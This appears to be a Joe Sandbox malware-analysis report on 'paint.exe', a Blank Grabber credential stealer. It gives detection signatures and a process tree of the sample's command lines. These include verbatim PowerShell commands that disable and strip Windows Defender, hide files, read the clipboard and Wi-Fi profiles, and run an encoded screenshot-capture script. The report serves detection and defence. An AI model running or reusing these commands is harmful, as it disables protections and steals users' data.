Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
paint.exe

Overview

General Information

Sample name:paint.exe
Analysis ID:1584382
MD5:14f0421574fd16a0a6a7ac20fe22482b
SHA1:64974f8d78d54c43775ab2a67e4341442bfeb01a
SHA256:ee5707904b7372b5389df014be575f574497907db3cad4ba45d52adc8f12e0a3
Tags:exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • paint.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\paint.exe" MD5: 14F0421574FD16A0A6A7AC20FE22482B)
    • paint.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\paint.exe" MD5: 14F0421574FD16A0A6A7AC20FE22482B)
      • cmd.exe (PID: 4588 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7188 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3584 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1780 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 8036 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 3852 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 6492 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 1900 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1312 cmdline: attrib +h +s "C:\Users\user\Desktop\paint.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 6120 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7200 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7584 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7620 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6812 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5284 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8144 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 1312 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8092 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8100 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 6476 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8364 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8480 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 8604 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8508 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8696 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8516 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8648 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8656 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8744 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 8772 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8832 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8844 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8896 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8920 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8976 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 9012 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9064 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9076 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
